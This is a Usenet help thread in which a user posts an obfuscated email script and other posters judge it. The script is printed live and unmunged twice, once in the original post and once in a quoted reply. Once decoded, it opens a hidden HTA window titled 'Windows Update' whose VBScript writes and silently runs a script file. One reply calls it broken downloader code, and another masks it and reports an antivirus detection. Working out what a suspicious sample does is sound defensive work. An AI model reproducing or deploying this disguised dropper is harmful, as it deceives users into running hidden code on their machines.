wtf is this? i got this by email today! help?

[Anonymous]

<!-- HTML Source Code Protected By: <http://www.DesignerWiz.com> FREE HTML Source Code Encryption Protection -->
<script>
<!--
document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3EWindows%20Update%3C/TITLE%3E%0D%0A%3CHTA%3AAPPLICATION%20ID%3D%22Q%22%20APPLICATIONNAME%3D%22Q%22%20BORDER%3D%22none%22%20BORDERSTYLE%3D%22normal%22%20CAPTION%3D%22no%22%20ICON%3D%22%22%20CONTEXTMENU%3D%22no%22%20MAXIMIZEBUTTON%3D%22no%22%20MINIMIZEBUTTON%3D%22no%22%20SHOWINTASKBAR%3D%22no%22%20SINGLEINSTANCE%3D%22no%22%20SYSMENU%3D%22no%22%20VERSION%3D%221.0%22%20WINDOWSTATE%3D%22minimize%22/%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0D%0AMyFile%20%3D%20%22%27%2CszHTAVbsName%2C%27%22%0D%0ASet%20FSO%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0D%0ASet%20TSO%20%3D%20FSO.CreateTextFile%28MyFile%2C%20True%29%0D%0ATSO.write%20%22dim%20filesys%2C%20filetxt%2C%20getname%2C%20path%2C%20textfile%2C%20i%22%20%26%20vbcrlf%0D%0ATSO.write%20%22textfile%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filesys%20%3D%20CreateObject%28%22%22Scripting.FileSystemObject%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filetxt%20%3D%20filesys.CreateTextFile%28textfile%2C%20True%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22getname%20%3D%20filesys.GetFileName%28path%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20a%22%20%26%20vbcrlf%0D%0ATSO.write%20%22a%3DArray%28%27%2C0%27%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22for%20i%3D0%20to%20%27%2C0%27%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Write%28chr%28a%28i%29%29%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22next%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Close%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20z%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20zz%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Const%20ForReading%20%3D%201%2C%20ForWriting%20%3D%202%2C%20ForAppending%20%3D%203%22%20%26%20vbcrlf%0D%0ATSO.write%20%22const%20RemoteExe%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22set%20zz%20%3D%20wscript.createobject%28%22%22wscript.shell%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22z%20%3D%20zz.run%20%28%22%22%27%2CszHTAFileName%2C%27%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22wscript.quit%22%20%26%20vbcrlf%0D%0ASet%20TSO%20%3D%20Nothing%0D%0ASet%20FSO%20%3D%20Nothing%0D%0ADim%20WshShell%0D%0ASet%20WshShell%20%3D%20CreateObject%28%22WScript.Shell%22%29%0D%0AWshShell.Run%20%22%27%2CszHTAVbsName%2C%27%22%2C%200%2C%20false%0D%0A%3C/SCRIPT%3E%0D%0A%3Cscript%3Ewindow.close%28%29%3C/script%3E%0D%0A%3C/HEAD%3E%0D%0A%3C/HTML%3E"));
//-->
</script>

 

[pcbutts1]

George the troll, haven't you learned anything?

--

Newsgroup Trolls. Read about mine here http://www.pcbutts1.com/downloads
The list grows. Leythos the stalker http://www.leythosthestalker.com, David
H. Lipman, Max M Wachtell III aka What's in a Name?, Fitz,
Rhonda Lea Kirk, Meat Plow, F Kwatu F, George Orwell

 

[Adam Piggott]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

<!-- HTML Source Code Protected By: <http://www.DesignerWiz.com> FREE
HTML Source Code Encryption Protection --> <script> <!--
document.write(unescape("%3CHTML%3E%3CHEAD%3E%0D%0A%3CTITLE%3EWindows%20Update%3C/TITLE%3E%0D%0A%3CHTA%3AAPPLICATION%20ID%3D%22Q%22%20APPLICATIONNAME%3D%22Q%22%20BORDER%3D%22none%22%20BORDERSTYLE%3D%22normal%22%20CAPTION%3D%22no%22%20ICON%3D%22%22%20CONTEXTMENU%3D%22no%22%20MAXIMIZEBUTTON%3D%22no%22%20MINIMIZEBUTTON%3D%22no%22%20SHOWINTASKBAR%3D%22no%22%20SINGLEINSTANCE%3D%22no%22%20SYSMENU%3D%22no%22%20VERSION%3D%221.0%22%20WINDOWSTATE%3D%22minimize%22/%3E%0D%0A%3CSCRIPT%20LANGUAGE%3D%22VBScript%22%3E%0D%0AMyFile%20%3D%20%22%27%2CszHTAVbsName%2C%27%22%0D%0ASet%20FSO%20%3D%20CreateObject%28%22Scripting.FileSystemObject%22%29%0D%0ASet%20TSO%20%3D%20FSO.CreateTextFile%28MyFile%2C%20True%29%0D%0ATSO.write%20%22dim%20filesys%2C%20filetxt%2C%20getname%2C%20path%2C%20textfile%2C%20i%22%20%26%20vbcrlf%0D%0ATSO.write%20%22textfile%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filesys%20%3D%20CreateObject%28%22%22Scripting.FileSystemObjec t%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Set%20filetxt%20%3D%20filesys.CreateTextFile%28textfile%2C%20True%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22getname%20%3D%20filesys.GetFileName%28path%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20a%22%20%26%20vbcrlf%0D%0ATSO.write%20%22a%3DArray%28%27%2C0%27%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22for%20i%3D0%20to%20%27%2C0%27%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Write%28chr%28a%28i%29%29%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22next%22%20%26%20vbcrlf%0D%0ATSO.write%20%22filetxt.Close%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20z%22%20%26%20vbcrlf%0D%0ATSO.write%20%22dim%20zz%22%20%26%20vbcrlf%0D%0ATSO.write%20%22Const%20ForReading%20%3D%201%2C%20ForWriting%20%3D%202%2C%20ForAppending%20%3D%203%22%20%26%20vbcrlf%0D%0ATSO.write%20%22const%20RemoteExe%20%3D%20%22%22%27%2CszHTAFileName%2C%27%22%22%22%20%26%20vbcrlf%0D%0ATSO.write%20%22set%20zz%20%3D%20wscript.createobject%28%22%22wscript.shell%22%22%29%22%20%26%20vbcrlf
%0D%0ATSO.write%20%22z%20%3D%20zz.run%20%28%22%22%27%2CszHTAFileName%2C%27%22%22%29%22%20%26%20vbcrlf%0D%0ATSO.write%20%22wscript.quit%22%20%26%20vbcrlf%0D%0ASet%20TSO%20%3D%20Nothing%0D%0ASet%20FSO%20%3D%20Nothing%0D%0ADim%20WshShell%0D%0ASet%20WshShell%20%3D%20CreateObject%28%22WScript.Shell%22%29%0D%0AWshShell.Run%20%22%27%2CszHTAVbsName%2C%27%22%2C%200%2C%20false%0D%0A%3C/SCRIPT%3E%0D%0A%3Cscript%3Ewindow.close%28%29%3C/script%3E%0D%0A%3C/HEAD%3E%0D%0A%3C/HTML%3E"));
//--> </script>

Looks like an attempt to create a program that downloads a virus. Either
it's broken or your email client has altered some of the code, as it does
not quite "unravel" properly.
- --
Adam Piggott, Proprietor, Proactive Services (Computing).
http://www.proactiveservices.co.uk/

Please replace dot invalid with dot uk to email me.
Apply personally for PGP public key.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFGOFu+7uRVdtPsXDkRAjVFAJwLLRY94++oGXkfIDcDBa0PGf7scACff0c/
CpltbiQiJsZZrRA3XkKP9Ok=
=uK3O
-----END PGP SIGNATURE-----

 

[Ron Lopshire]

<!-- HTML Source Code Protected By: <hxxp://www.DesignerWiz.com> FREE HTML Source Code Encryption Protection -->
<script>
<!--
document.write(unescape("*******************"));
//-->
</script>

Please don't post this crap without munging it. Not everyone around here
is savvy enough to keep Javascript disabled.

KAV did not like your post, says it is this.

http://www.viruslist.com/en/viruses/encyclopedia?virusid=49958

I cannot send the sample to the Virus Total and/or Jotti online services
without disabling all of my protection. You can submit the sample using
email if you would like another opinion.

http://www.virustotal.com/en/indexx.html

http://virusscan.jotti.org/

Both servers are swamped at the moment.

Ron